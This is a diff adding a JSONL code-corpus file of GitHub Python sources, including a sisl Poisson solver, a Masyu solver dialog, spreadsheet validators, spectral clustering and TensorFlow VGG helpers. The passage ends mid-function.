diff --git "a/3720.jsonl" "b/3720.jsonl" new file mode 100644--- /dev/null +++ "b/3720.jsonl" @@ -0,0 +1,753 @@ +{"seq_id":"4256418184","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\nr\"\"\" Hartree correction for FFT-Poisson solver for arbitrary electrode positions\n\nDeveloper: Nick Papior\nContact: nickpapior gmail.com\nsisl-version: >=0.9.3\n\nThis Poisson solver uses pyamg to calculate an initial guess for the Poisson\nsolution to correct the FFT solution. It does this by setting up boundary\nconditions on electrodes and then solving the Hartree potential using multi-grid\nsolvers.\n\nIt requires two inputs and has several optional flags.\n\n- The siesta.TBT.nc file which contains the geometry that is to be calculated for\n The reason for using the siesta.TBT.nc file is the ease of use:\n\n The siesta.TBT.nc contains electrode atoms and device atoms. Hence it\n becomes easy to read in the electrode atomic positions.\n Note that since you'll always do a 0 V calculation it is easy to\n do a 0 bias calculation first, then create a guess using this script,\n and finally do bias calculations.\n\n- The grid size of the simulation grid, this needs to be commensurate with the\n actual Siesta grid used.\n\nThis script is a command-line utility with several options (please refer to\n--help). There are a few important flags you should know about:\n\n --tolerance [tol] specify the tolerance of the solution, the tighter the longer solution time\n --pyamg-shape [nx ny nz] shape for which the solution is calculated (impacts speed)\n --shape [nx ny nz] final shape of the solution, if pyamg-shape is not the same the solution will be interpolated (order=2)\n --dtype [f|d] the data-type used to solve the Poisson equation\n --out [file] any sisl compatible grid file, please at least do --out V.TSV.nc which is compatible with TranSiesta.\n\nThis tool requires the following packages:\n- pyamg\n\nKnown problems:\n- The pyamg solver requires quite a bit of memory, you should preferentially select\n the largest grid (up to the actual grid size you want) possible.\n- The Neumann implementation in the boundary conditions is not correct, hence\n it may never converge (or produce nan's). If this happens please try another\n boundary condition.\n- It may not always converge which requires some fine-tuning of the tolerances,\n secondly it may converge too fast so the solution is not really good.\n\"\"\"\nimport argparse as argp\nimport os\nimport sys\nfrom pathlib import Path\n\nimport numpy as np\n\nimport sisl as si\n\n__all__ = [\"pyamg_solve\", \"solve_poisson\", \"fftpoisson_fix_cli\", \"fftpoisson_fix_run\"]\n\n\n_BC = si.BoundaryCondition\n\n# Base-script name\n_script = Path(sys.argv[0]).name\n\n_DEBUG = os.environ.get(\"SISL_TS_FFT_DEBUG\", \"False\")\n# Determine from env-var whether we should use debug mode\n_DEBUG = _DEBUG.lower() in (\"true\", \"t\", \"1\", \"y\", \"yes\", \"on\")\n\n\ndef pyamg_solve(A, b, tolerance=1e-12, accel=None, title=\"\"):\n import pyamg\n\n print(f\"\\nSetting up pyamg solver... 
{title}\")\n ml = pyamg.aggregation.smoothed_aggregation_solver(A, max_levels=1000)\n del A\n print(ml)\n residuals = []\n\n def callback(x):\n # residuals calculated in the solve function is a pre-conditioned residual\n # residuals.append(np.linalg.norm(b - A.dot(x)) ** 0.5)\n print(\n \" {:4d} residual = {:.5e} x0-residual = {:.5e}\".format(\n len(residuals) - 1, residuals[-1], residuals[-1] / residuals[0]\n )\n )\n\n x = ml.solve(\n b,\n tol=tolerance,\n callback=callback,\n residuals=residuals,\n accel=accel,\n cycle=\"W\",\n maxiter=1e7,\n )\n print(\"Done solving the Poisson equation!\")\n return x\n\n\ndef solve_poisson(\n geometry,\n shape,\n radius=\"empirical\",\n dtype=np.float64,\n tolerance=1e-8,\n accel=None,\n boundary_fft=True,\n device_val=None,\n plot_boundary=False,\n box=False,\n boundary=None,\n **elecs_V,\n):\n \"\"\"Solve Poisson equation\"\"\"\n error = False\n elecs = []\n for name in geometry.names:\n if (\"+\" in name) or (name in [\"Buffer\", \"Device\"]):\n continue\n\n # This is actually an electrode\n elecs.append(name)\n error = error or (name not in elecs_V)\n\n if len(elecs) == 0:\n raise ValueError(f\"{_script}: Could not find any electrodes in the geometry.\")\n\n error = error or len(elecs) != len(elecs_V)\n if error:\n for name in elecs:\n if not name in elecs_V:\n print(f\" missing electrode bias: {name}\")\n raise ValueError(\n f\"{_script}: Missing electrode arguments for specifying the bias.\"\n )\n\n if boundary is None:\n bc = [[_BC.PERIODIC, _BC.PERIODIC] for _ in range(3)]\n else:\n bc = []\n\n def bc2bc(s):\n return {\n \"periodic\": \"PERIODIC\",\n \"p\": \"PERIODIC\",\n _BC.PERIODIC: \"PERIODIC\",\n \"dirichlet\": \"DIRICHLET\",\n \"d\": \"DIRICHLET\",\n _BC.DIRICHLET: \"DIRICHLET\",\n \"neumann\": \"NEUMANN\",\n \"n\": \"NEUMANN\",\n _BC.NEUMANN: \"NEUMANN\",\n }.get(s.lower(), s.upper())\n\n for bottom, top in boundary:\n bc.append([getattr(_BC, bc2bc(bottom)), getattr(_BC, bc2bc(top))])\n if len(bc) != 3:\n raise ValueError(\n f\"{_script}: Requires a 3x2 list input for the boundary conditions.\"\n )\n\n def _create_shape_tree(xyz, A, B=None):\n \"\"\"Takes two lists A and B which returns a shape with a binary nesting\n\n This makes further index handling much faster.\n \"\"\"\n if B is None or len(B) == 0:\n return _create_shape_tree(xyz, *np.array_split(A, 2))\n\n AA, BB = None, None\n if len(A) == 1:\n AA = si.Sphere(radius, xyz[A[0]])\n if len(B) == 0:\n return AA\n\n if len(B) == 1:\n BB = si.Sphere(radius, xyz[B[0]])\n if len(A) == 0:\n return BB\n\n # Quick return if these are the final ones\n if AA and BB:\n return AA | BB\n\n if not AA:\n AA = _create_shape_tree(xyz, *np.array_split(A, 2))\n if not BB:\n BB = _create_shape_tree(xyz, *np.array_split(B, 2))\n\n return AA | BB\n\n # Create grid\n geometry.set_boundary_condition(bc)\n grid = si.Grid(shape, geometry=geometry, dtype=dtype)\n\n class _fake:\n @property\n def shape(self):\n return shape\n\n @property\n def dtype(self):\n return dtype\n\n # Fake the grid to reduce memory requirement\n grid.grid = _fake()\n\n # Construct matrices we need to specify the boundary conditions on\n A, b = grid.topyamg()\n\n # Short-hand notation\n xyz = geometry.xyz\n\n if not device_val is None:\n print(f\"\\nApplying device potential = {device_val}\")\n idx = geometry.names[\"Device\"]\n device = _create_shape_tree(xyz, idx)\n idx = grid.index_truncate(grid.index(device))\n idx = grid.pyamg_index(idx)\n grid.pyamg_fix(A, b, idx, device_val)\n\n # Apply electrode constants\n 
print(\"\\nApplying electrode potentials\")\n for i, elec in enumerate(elecs):\n V = elecs_V[elec]\n print(f\" - {elec} = {V}\")\n\n idx = geometry.names[elec]\n elec_shape = _create_shape_tree(xyz, idx)\n\n idx = grid.index_truncate(grid.index(elec_shape))\n idx = grid.pyamg_index(idx)\n grid.pyamg_fix(A, b, idx, V)\n del idx, elec_shape\n\n # Now we have initialized both A and b with correct boundary conditions\n # Lets solve the Poisson equation!\n if box:\n # No point in solving the boundary problem if requesting a box\n boundary_fft = False\n grid.grid = b.reshape(shape)\n del A\n else:\n x = pyamg_solve(\n A,\n b,\n tolerance=tolerance,\n accel=accel,\n title=\"solving electrode boundary conditions\",\n )\n grid.grid = x.reshape(shape)\n\n del A, b\n\n if boundary_fft:\n # Change boundaries to always use dirichlet\n # This ensures that once we set the boundaries we don't\n # get any side-effects\n BC = si.BoundaryCondition\n periodic = [\n bc == BC.PERIODIC or geometry.nsc[i] > 1\n for i, bc in enumerate(grid.lattice.boundary_condition[:, 0])\n ]\n bc = np.repeat(np.array([BC.DIRICHLET], np.int32), 6).reshape(3, 2)\n for i in (0, 1, 2):\n if periodic[i]:\n bc[i, :] = BC.PERIODIC\n grid.set_bc(bc)\n A, b = grid.topyamg()\n\n # Solve only for the boundary fixed\n def sl2idx(grid, sl):\n return grid.pyamg_index(grid.mgrid(sl))\n\n # Create slices\n sl = [slice(0, g) for g in grid.shape]\n\n # One boundary at a time\n for i in (0, 1, 2):\n if periodic[i]:\n continue\n new_sl = sl[:]\n new_sl[i] = slice(0, 1)\n idx = sl2idx(grid, new_sl)\n grid.pyamg_fix(\n A, b, idx, grid.grid[new_sl[0], new_sl[1], new_sl[2]].reshape(-1)\n )\n new_sl[i] = slice(grid.shape[i] - 1, grid.shape[i])\n idx = sl2idx(grid, new_sl)\n grid.pyamg_fix(\n A, b, idx, grid.grid[new_sl[0], new_sl[1], new_sl[2]].reshape(-1)\n )\n\n if plot_boundary:\n dat = b.reshape(*grid.shape)\n # now plot every plane\n import matplotlib.pyplot as plt\n\n slicex3 = np.index_exp[:] * 3\n axs = [\n np.linspace(0, grid.lattice.length[ax], shape, endpoint=False)\n for ax, shape in enumerate(grid.shape)\n ]\n\n for i in (0, 1, 2):\n idx = list(slicex3)\n j = (i + 1) % 3\n k = (i + 2) % 3\n if i > j:\n i, j = j, i\n X, Y = np.meshgrid(axs[i], axs[j])\n\n for v, head in ((0, \"bottom\"), (-1, \"top\")):\n plt.figure()\n plt.title(f\"axis: {'ABC'[k]} ({head})\")\n idx[k] = v\n plt.contourf(X, Y, dat[tuple(idx)].T)\n plt.xlabel(f\"Distance along {'ABC'[i]} [Ang]\")\n plt.ylabel(f\"Distance along {'ABC'[j]} [Ang]\")\n plt.colorbar()\n\n plt.show()\n\n grid.grid = _fake()\n x = pyamg_solve(\n A,\n b,\n tolerance=tolerance,\n accel=accel,\n title=\"removing electrode boundaries and solving for edge fixing\",\n )\n\n grid.grid = x.reshape(shape)\n del A, b\n\n return grid\n\n\ndef fftpoisson_fix_cli(subp=None):\n is_sub = not subp is None\n\n title = \"FFT Poisson corrections for TranSiesta calculations for arbitrary number of electrodes.\"\n if is_sub:\n global _script\n _script = f\"{_script} ts-fft\"\n p = subp.add_parser(\"ts-fft\", description=title, help=title)\n else:\n p = argp.ArgumentParser(title)\n\n tuning = p.add_argument_group(\n \"tuning\", \"Tuning fine details of the Poisson calculation.\"\n )\n\n p.add_argument(\n \"--geometry\",\n \"-G\",\n default=\"siesta.TBT.nc\",\n metavar=\"FILE\",\n help=\"siesta.TBT.nc file which contains the geometry and electrode information, currently we cannot read that from fdf-files.\",\n )\n\n p.add_argument(\n \"--shape\",\n \"-s\",\n nargs=3,\n type=int,\n required=True,\n metavar=(\"A\", \"B\", 
\"C\"),\n help=\"Grid shape, this *has* to be conforming to the TranSiesta calculation, read from output: 'InitMesh: MESH = A x B x C'\",\n )\n\n n = {\"a\": \"first\", \"b\": \"second\", \"c\": \"third\"}\n for d in \"abc\":\n p.add_argument(\n f\"--boundary-condition-{d}\",\n f\"-bc-{d}\",\n nargs=2,\n type=str,\n default=[\"p\", \"p\"],\n metavar=(\"BOTTOM\", \"TOP\"),\n help=(\n \"Boundary condition along the {} lattice vector [periodic/p, neumann/n, dirichlet/d]. \"\n \"Specify separate BC at the start and end of the lattice vector, respectively.\".format(\n n[d]\n )\n ),\n )\n\n p.add_argument(\n \"--elec-V\",\n \"-V\",\n action=\"append\",\n nargs=2,\n metavar=(\"NAME\", \"V\"),\n default=[],\n help=\"Specify chemical potential on electrode\",\n )\n\n p.add_argument(\n \"--pyamg-shape\",\n \"-ps\",\n nargs=3,\n type=int,\n metavar=(\"A\", \"B\", \"C\"),\n default=None,\n help=\"Grid used to solve the Poisson equation, if shape is different the Grid will be interpolated (order=2) after.\",\n )\n\n p.add_argument(\n \"--device\",\n \"-D\",\n type=float,\n default=None,\n metavar=\"VAL\",\n help=\"Fix the value of all device atoms to a value. In some cases this turns out to yield a better box boundary. The default is to *not* fix the potential on the device atoms.\",\n )\n\n tuning.add_argument(\n \"--radius\",\n \"-R\",\n type=float,\n default=3.0,\n metavar=\"R\",\n help=(\n \"Radius of atoms when figuring out the electrode sizes, this corresponds to the extend of \"\n \"each electrode where boundary conditions are fixed. Should be tuned according to the atomic species [3 Ang]\"\n ),\n )\n\n tuning.add_argument(\n \"--dtype\",\n \"-d\",\n choices=[\"d\", \"f64\", \"f\", \"f32\"],\n default=\"d\",\n help=\"Precision of data (d/f64==double, f/f32==single)\",\n )\n\n tuning.add_argument(\n \"--tolerance\",\n \"-T\",\n type=float,\n default=1e-7,\n metavar=\"EPS\",\n help=\"Precision required for the pyamg solver. NOTE when using single precision arrays this should probably be on the order of 1e-5\",\n )\n\n tuning.add_argument(\n \"--acceleration\",\n \"-A\",\n dest=\"accel\",\n default=\"cg\",\n metavar=\"METHOD\",\n help=\"\"\"Acceleration method for pyamg. May be useful if it fails to converge\n\nTry one of: cg, gmres, fgmres, cr, cgnr, cgne, bicgstab, steepest_descent, minimal_residual\"\"\",\n )\n\n test = p.add_argument_group(\n \"testing\",\n \"Options used for testing output. None of these options should be used for production runs!\",\n )\n test.add_argument(\n \"--box\",\n dest=\"box\",\n action=\"store_true\",\n default=False,\n help=\"Only store the initial box solution (i.e. do not run PyAMG)\",\n )\n\n test.add_argument(\n \"--no-boundary-fft\",\n action=\"store_false\",\n dest=\"boundary_fft\",\n default=True,\n help=\"Once the electrode boundary conditions are solved we perform a second solution with boundaries fixed. Using this flag disables this second solution.\",\n )\n\n if _DEBUG:\n test.add_argument(\n \"--plot\",\n dest=\"plot\",\n default=None,\n type=int,\n help=\"Plot grid by averaging over the axis given as argument\",\n )\n\n test.add_argument(\n \"--plot-boundary\",\n dest=\"plot_boundary\",\n action=\"store_true\",\n help=\"Plot all 6 edges of the box with their fixed values (just before 2nd pyamg solve step)\",\n )\n\n p.add_argument(\n \"--out\",\n \"-o\",\n action=\"append\",\n default=None,\n help=\"Output file to store the resulting Poisson solution. 
It *has* to have TSV.nc file ending to make the file conforming with TranSiesta.\",\n )\n\n if is_sub:\n p.set_defaults(runner=fftpoisson_fix_run)\n else:\n fftpoisson_fix_run(p.parse_args())\n\n\ndef fftpoisson_fix_run(args):\n if args.out is None:\n print(\n f\">\\n>\\n>{_script}: No out-files has been specified, work will be carried out but not saved!\\n>\\n>\\n\"\n )\n\n # Read in geometry\n geometry = si.get_sile(args.geometry).read_geometry()\n\n # Figure out the electrodes\n elecs_V = {}\n if len(args.elec_V) == 0:\n print(geometry.names)\n raise ValueError(\n f\"{_script}: Please specify all electrode potentials using --elec-V\"\n )\n\n for name, V in args.elec_V:\n elecs_V[name] = float(V)\n\n if args.dtype.lower() in (\"f\", \"f32\"):\n dtype = np.float32\n elif args.dtype.lower() in (\"d\", \"f64\"):\n dtype = np.float64\n\n # Now we can solve Poisson\n if args.pyamg_shape is None:\n shape = args.shape\n else:\n shape = args.pyamg_shape\n\n # Create the boundary conditions\n boundary = []\n boundary.append(args.boundary_condition_a)\n boundary.append(args.boundary_condition_b)\n boundary.append(args.boundary_condition_c)\n\n V = solve_poisson(\n geometry,\n shape,\n radius=args.radius,\n boundary=boundary,\n dtype=dtype,\n tolerance=args.tolerance,\n box=args.box,\n accel=args.accel,\n boundary_fft=args.boundary_fft,\n device_val=args.device,\n plot_boundary=args.plot_boundary,\n **elecs_V,\n )\n\n if _DEBUG:\n if not args.plot is None:\n dat = V.average(args.plot)\n import matplotlib.pyplot as plt\n\n axs = [\n np.linspace(0, V.lattice.length[ax], shape, endpoint=False)\n for ax, shape in enumerate(V.shape)\n ]\n idx = list(range(3))\n\n # Now plot data\n del axs[args.plot]\n del idx[args.plot]\n\n X, Y = np.meshgrid(*axs)\n plt.contourf(X, Y, np.squeeze(dat.grid).T)\n plt.colorbar()\n plt.title(f\"Averaged over {'ABC'[args.plot]} axis\")\n plt.xlabel(f\"Distance along {'ABC'[idx[0]]} [Ang]\")\n plt.ylabel(f\"Distance along {'ABC'[idx[1]]} [Ang]\")\n plt.show()\n\n if np.any(np.array(args.shape) != np.array(V.shape)):\n print(\"\\nInterpolating the solution...\")\n V = V.interp(args.shape, 2)\n print(\"Done interpolating!\")\n\n print(\"\")\n # Write solution to the output\n if not args.out is None:\n for out in args.out:\n print(f\"Writing to file: {out}...\")\n V.write(out)\n\n\nif __name__ == \"__main__\":\n fftpoisson_fix_cli()\n","repo_name":"zerothi/sisl","sub_path":"src/sisl_toolbox/transiesta/poisson/fftpoisson_fix.py","file_name":"fftpoisson_fix.py","file_ext":"py","file_size_in_byte":18437,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"61"} +{"seq_id":"11522950154","text":"from MasyuDialog import *\nimport tkinter as tk\n\n# Dialog displayed when a solution cannot be found\n# for the current puzzle.\nclass NoSolutionDialog(MasyuDialog):\n # Class constructor\n\n def __init__(self, parentWindow):\n super().__init__(parentWindow)\n self.__topLevel = None\n\n def okHandler(self):\n self.__topLevel.destroy()\n\n def showDialog(self):\n toplevel = tk.Toplevel()\n toplevel.resizable(0, 0)\n self.__topLevel = toplevel\n\n toplevel.title('No solution found')\n\n l1 = tk.Label(toplevel, image=\"::tk::icons::warning\")\n l1.grid(row=0, column=0, pady=(7, 0), padx=(10, 30), sticky=\"e\")\n l2 = tk.Label(toplevel, text='Unable to find a solution')\n l2.grid(row=0, column=1, columnspan=4, padx=(0, 30), pady=(7, 10), sticky=\"w\")\n\n b2 = tk.Button(toplevel, text=\"OK\", command=self.okHandler, width=10)\n b2.grid(row=1, column=2, 
padx=(2, 35), pady=(0, 15), sticky=\"e\")\n\n super().showDialog(toplevel)","repo_name":"fredtaft/MasyuSolver","sub_path":"NoSolutionDialog.py","file_name":"NoSolutionDialog.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23457576371","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\ndef solve(smax, sstr):\n friends = 0\n up = 0\n for k, digit in enumerate(sstr):\n digit = int(digit)\n if digit > 0 and up < k:\n new_friends = k - up\n up += new_friends\n friends += new_friends\n up += digit\n return friends\n\n\nif __name__ == \"__main__\":\n testcases = int(raw_input())\n\n for caseNr in range(1, testcases+1):\n smax, sstr = raw_input().split(\" \")\n print(\"Case #%i: %s\" % (caseNr, solve(smax, sstr)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/882.py","file_name":"882.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"744902879","text":"# pylint: disable=anomalous-backslash-in-string\n'''This module contains agnostic validation functions.'''\n\nimport re\n\nfrom datetime import datetime\nfrom xlrd import xldate_as_tuple\n\n# Enum values used in the spreadsheet.\n_LEASING_STATUS = [u'LEASED', u'LEASED - M2M', u'RENO', u'REHAB', u'VACANT - ADVERT', u'VACANT - PENDING', u'VACANT - TRANSITION', u'N/A']\n_CLASS_OF_SPACE = [u'A', u'B', u'C']\n_OWNER_ESTIMATE_SOURCES = [u'INTERNAL AVM', u'EXTERNAL BPO', u'N/A']\n_US_STATES_SHORT = [u'AL', u'AK', u'AZ', u'AR', u'AS', u'CA', u'CO', u'CT', u'DC', u'DE', u'FL', u'GA', u'GU', u'HI', u'ID', u'IL', u'IN', u'IA',\n u'KS', u'KY', u'LA', u'ME', u'MD', u'MA', u'MI', u'MN', u'MP', u'MS', u'MO', u'MT', u'NE', u'NV', u'NH', u'NJ', u'NM', u'NY', u'NC',\n u'ND', u'OH', u'OK', u'OR', u'PA', u'PR', u'RI', u'SC', u'SD', u'TN', u'TX', u'UT', u'VT', u'VA', u'VI', u'WA', u'WV', u'WI', u'WY']\n_US_STATES_LONG = [u'ALASKA', u'ALABAMA', u'ARKANSAS', u'AMERICAN SAMOA', u'ARIZONA', u'CALIFORNIA', u'COLORADO', u'CONNECTICUT', u'DISTRICT OF COLUMBIA',\n u'DELAWARE', u'FLORIDA', u'GEORGIA', u'GUAM', u'HAWAII', u'IOWA', u'IDAHO', u'ILLINOIS', u'INDIANA', u'KANSAS', u'KENTUCKY', u'LOUISIANA',\n u'MASSACHUSETTS', u'MARYLAND', u'MAINE', u'MICHIGAN', u'MINNESOTA', u'MISSOURI', u'NORTHERN MARIANA ISLANDS', u'MISSISSIPPI', u'MONTANA',\n u'NATIONAL', u'NORTH CAROLINA', u'NORTH DAKOTA', u'NEBRASKA', u'NEW HAMPSHIRE', u'NEW JERSEY', u'NEW MEXICO', u'NEVADA', u'NEW YORK',\n u'OHIO', u'OKLAHOMA', u'OREGON', u'PENNSYLVANIA', u'PUERTO RICO', u'RHODE ISLAND', u'SOUTH CAROLINA', u'SOUTH DAKOTA' 'TENNESSEE', u'TEXAS',\n u'UTAH', u'VIRGINIA', u'VIRGIN ISLANDS', u'VERMONT', u'WASHINGTON', u'WISCONSIN', u'WEST VIRGINIA', u'WYOMING']\n\n\ndef _check_regex_field(regex, field):\n '''Check if specified regex matches given field.'''\n regex_object = re.compile(regex)\n # Need to stringify the field, because it might be a number.\n result = re.match(regex_object, str(field))\n if not result:\n return (False, 'Invalid character or format.')\n return (True, None)\n\n\n# Cell type validation functions.\ndef valid_date(field):\n '''Check for a valid date field.'''\n # Excel uses floats for storing dates. If that alone wasn't a bad idea, there are two base date systems. We assume we are using the default, 1900-one here.\n # xlrd module provides this handy snippet for transforming dates. 
Rely on it for correctness.\n try:\n xldate_as_tuple(field, 0)\n except ValueError:\n # Try parsing it directly using datetime.strptime instead.\n date_formats = ['%d/%m/%Y', '%d/%b/%Y', '%Y/%m/%d', '%Y/%b/%d', '%d-%m-%Y', '%d-%b-%Y', '%Y-%m-%d', '%Y-%b-%d']\n for date_format in date_formats:\n try:\n datetime.strptime(field, date_format)\n return (True, None)\n except ValueError:\n pass\n return (False, 'Invalid date.')\n return (True, None)\n\n\ndef valid_percentage(field, precision=None):\n '''Check for a valid percentage field.'''\n # Eg. 8.00%, 8%, 0.08\n try:\n value = float(field)\n except ValueError:\n # Due to formatting issues need to concatenate %$ separately.\n percentage_regex = ('^\\d+\\.\\d{%d}' % precision + '%$') if precision else '^\\d+(.\\d+)?%$'\n result, errors = _check_regex_field(percentage_regex, field)\n if not result:\n return (False, errors)\n value = float(field[:-1])\n # Check for 0-100 bounds.\n if not 0.0 <= value <= 100.0:\n return (False, 'Percentage outside 0-100 bounds.')\n return (True, None)\n\n\ndef valid_dollar(field, precision=None):\n '''Check for a valid dollar field.'''\n # Eg. $3,950, $3,950.00, 3950.0\n try:\n float(field)\n except ValueError:\n value = field\n # Check for valid currency mark.\n if field.startswith('$'):\n value = field[1:]\n elif field.endswith('USD'):\n value = field[:-3]\n # Replace kilo delimiters.\n value = value.replace(',', '')\n # Try to convert it again without all the extra chars.\n try:\n float(value)\n except ValueError:\n return (False, 'Invalid dollar value.')\n if precision is not None:\n dollar_regex = '^\\d+(\\.\\d{%d})$' % precision\n result, _ = _check_regex_field(dollar_regex, value)\n if not result:\n return (False, 'Invalid precision.')\n return (True, None)\n\n\ndef valid_year(field):\n '''Check if year built field is valid.'''\n # Excel saves most numbers as float, try to check that too.\n # Eg. 2001, 2001.0\n year_regex = '^\\d{4}(.0)?$'\n return _check_regex_field(year_regex, field)\n\n\ndef valid_address(field):\n '''Check if address field is valid.'''\n # Eg. 789 Main Str Unit C\n address_regex = '^[ ]*\\w[ \\-,\\'\\w]+$'\n return _check_regex_field(address_regex, field)\n\n\ndef valid_city(field):\n '''Check if city field is valid.'''\n # Eg. New Reno\n city_regex = '^[ \\-\\'\\w]+$'\n return _check_regex_field(city_regex, field)\n\n\ndef valid_county(field):\n '''Check if county field is valid.'''\n # Eg. McPherson County\n county_regex = '^[ \\-\\'\\w]+$'\n return _check_regex_field(county_regex, field)\n\n\ndef valid_zip_code(field):\n '''Check if ZIP code field is valid.'''\n # Excel saves most numbers as float, try to check that too.\n # Eg. 56789, 56789.0, 45562-2544\n zip_regex = '^\\d{5}((.0)?|(-\\d{4}))?$'\n return _check_regex_field(zip_regex, field)\n\n\ndef valid_us_state(field):\n '''Check for a valid enum in a state field.'''\n if field.upper() not in _US_STATES_SHORT and field.upper() not in _US_STATES_LONG:\n return (False, 'No such US state: %s.' % field)\n return (True, None)\n\n\ndef valid_estimate_source(field):\n '''Check for a valid enum in a owner estimate source field.'''\n if field.upper() not in _OWNER_ESTIMATE_SOURCES:\n return (False, 'No such owner estimate source: %s.' % field)\n return (True, None)\n\n\ndef valid_leasing_status(field):\n '''Check for a valid enum in a leasing status field.'''\n if field.upper() not in _LEASING_STATUS:\n return (False, 'No such leasing status: %s.' 
% field)\n return (True, None)\n\n\ndef valid_class_of_space(field):\n '''Check for a valid enum in a leasing status field.'''\n if field.upper() not in _CLASS_OF_SPACE:\n return (False, 'No such class of space %s.' % field)\n return (True, None)\n\n\ndef valid_integer(field, min_value=None, max_value=None):\n '''Check for integer field.'''\n try:\n int(field)\n except ValueError:\n return (False, 'Not an integer: %s.' % field)\n value = int(field)\n # Perform bounds check.\n if min_value is not None and min_value > value:\n return (False, 'Integer outside of min bounds: %d.' % value)\n if max_value is not None and max_value < value:\n return (False, 'Integer outside of max bounds: %d.' % value)\n return (True, None)\n\n\ndef valid_float(field, min_value=None, max_value=None, precision=None):\n '''Check for float field.'''\n try:\n float(field)\n except ValueError:\n return (False, 'Not a float: %s.' % field)\n value = float(field)\n # Check for precision.\n if precision is not None:\n float_regex = ('^\\d+\\.\\d{%d}$' % precision) if precision else '^\\d+$'\n result, _ = _check_regex_field(float_regex, field)\n if not result:\n return (False, 'Precision does not match.')\n # Perform bounds check.\n if min_value is not None and min_value > value:\n return (False, 'Float outside of min bounds: %f.' % value)\n if max_value is not None and max_value < value:\n return (False, 'Float outside of max bounds: %f.' % value)\n return (True, None)\n","repo_name":"Millz0r/daedalus","sub_path":"daedalus/validation/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":7894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5619188385","text":"import numpy as np\nclass Spectral_Cluestering:\n def __init__(self, k, sigma):\n self.k = k\n self.sigma = sigma\n self.y = None\n\n def make_graph(self, X, S): # X is raw data\n affinity_matrix = np.zeros((X.shape[0], X.shape[0]))\n for i in range(X.shape[0]):\n for j in range(X.shape[0]):\n distances = np.linalg.norm(X[i] - X[j]) ** 2\n affinity_matrix[i][j] = np.exp(-distances / (S ** 2))\n # return np.fill_diagonal(affinity_matrix, 0)\n return affinity_matrix\n\n def laplasian_matrix(self, X, W, k):\n D = np.zeros((X.shape[0], X.shape[0]))\n I = np.ones((X.shape[0], X.shape[0]))\n d_s = W.sum(axis=1)\n d = []\n for i in range(d_s.size):\n d.append(float(d_s[i]))\n\n np.fill_diagonal(D, d)\n\n # if W has elements that are equal to zero, the corresponding elements in\n # D will also be zero, causing division by zero and resulting in NaN values in the L_sym matrix\n\n D_inv_sqrt = np.linalg.inv(np.sqrt(D + np.finfo(float).eps)) # add small constant to diagonal\n L_sym = D_inv_sqrt.dot(D - W).dot(D_inv_sqrt)\n\n # compute the first k eingrnvectors of L\n\n eigenvalues, eigenvectors = np.linalg.eig(L_sym)\n eigenvectors = eigenvectors[:, :k]\n U = np.vstack([eigenvectors[:, i] for i in range(k)])\n return U\n\n def fit(self, X):\n w = self.make_graph(X, self.sigma)\n U = self.laplasian_matrix(X, w, self.k)\n\n self.y = np.zeros((U.shape[0], U.shape[1]))\n for i in range(U.shape[0]):\n self.y = U[i, :]\n\n def predict(self, X):\n\n data = self.y\n from sklearn.cluster import KMeans\n kmeans = KMeans(n_clusters=self.k)\n data = data.reshape(-1, 1)\n kmeans.fit(data)\n labels = kmeans.labels_\n\n return 
labels","repo_name":"khAsya402/ML_practice","sub_path":"spectral.py","file_name":"spectral.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12905074775","text":"\n\nimport tensorflow as tf\nimport numpy as np\n\nvgg_param = np.load('vgg16.npy',encoding = 'latin1',allow_pickle = True).item()\n\ndef vgg_conv(x,name,trainable = False):\n with tf.variable_scope(name):\n if trainable :\n gene_fn = tf.Variable\n else:\n gene_fn = tf.constant\n return tf.nn.relu(tf.nn.bias_add(\n tf.nn.conv2d(x,gene_fn(vgg_param[name][0],dtype = tf.float32),\n (1,1,1,1),padding = 'SAME',name = name),\n gene_fn(vgg_param[name][1],dtype = tf.float32)))\n \n \ndef vgg_pool(x,name):\n with tf.variable_scope(name):\n return tf.nn.max_pool(x,\n ksize=[1,2, 2 , 1],\n strides=[1, 2, 2, 1],\n padding='SAME',\n name=name)\n \ndef conv(input_tensor, name, kw, kh, n_out, dw=1, dh=1, activation_fn=tf.nn.relu,trainable = True):\n\n n_in = input_tensor.get_shape()[-1].value\n with tf.variable_scope(name):\n if trainable :\n gene_fn = tf.Variable\n else:\n gene_fn = tf.constant\n weights = gene_fn(tf.truncated_normal(shape=(kh, kw, n_in, n_out), mean = 0.0,stddev=0.1), dtype=tf.float32, name='weights')\n biases = gene_fn(tf.constant(0.0, shape=[n_out]), dtype=tf.float32, name='biases')\n conv = tf.nn.conv2d(input_tensor, weights, (1, dh, dw, 1), padding='SAME')\n if activation_fn :\n activation = activation_fn(tf.nn.bias_add(conv, biases))\n else:\n activation = tf.nn.bias_add(conv,biases)\n tf.summary.histogram(\"weights\", weights)\n return activation\n \ndef deconv(input_tensor,name ,kw,kh,n_out,out_shape ,dw=2,dh=2,activation_fn=tf.nn.leaky_relu):\n \"这是反卷积\"\n n_in = input_tensor.get_shape()[-1].value\n\n #因为直接作为numpy数组来的话,似乎全都拿不到,这样的话,我至少自己指定最后一维,第一维他会自己拿到,但,,emm我怀疑会出问题\n \n with tf.variable_scope(name):\n weights = tf.Variable(tf.truncated_normal(shape = (kh,kw,n_out,n_in),stddev = 0.01),dtype = tf.float32,name = 'weights')\n #biases = tf.Variable(tf.constant(0.0,shape = [n_out]),dtype = tf.float32,name = 'biases')\n deconv_t = tf.nn.conv2d_transpose(input_tensor,weights,out_shape ,strides = (1,dh,dw,1),padding = 'SAME' )\n #conv2d_transpose(value, filter, output_shape, strides, padding=\"SAME\", \n # data_format=\"NHWC\", name=None)\n return deconv_t\n \ndef 